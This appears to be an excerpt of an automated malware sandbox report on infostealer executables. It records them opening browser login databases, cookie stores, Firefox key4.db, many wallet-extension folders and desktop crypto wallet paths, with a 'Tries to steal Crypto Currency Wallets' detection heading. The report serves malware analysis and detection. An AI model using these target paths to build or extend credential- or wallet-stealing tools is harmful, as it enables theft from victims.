                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.db
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                            Tries to steal Crypto Currency Wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                            Source: C:\Users\user\AppData\Local\Temp\1062370001\8c36d696e4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                            Source: C:\Users\user\AppData\Local\Temp\1062371001\0dd40f41c4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                            Source: random.exeBinary or memory string: WIN_81
                            Source: random.exeBinary or memory string: WIN_XP
                            Source: tmp2E19.tmp.21.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                            Source: random.exeBinary or memory string: WIN_XPe
                            Source: random.exeBinary or memory string: WIN_VISTA
                            Source: random.exeBinary or memory string: WIN_7
                            Source: random.exeBinary or memory string: WIN_8
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQL
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOP
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOP
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQY
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVT
                            Source: C:\Users\user\AppData\Local\Temp\1062369001\28f48f066a.exeDirectory queried: C:\Users\user\Documents
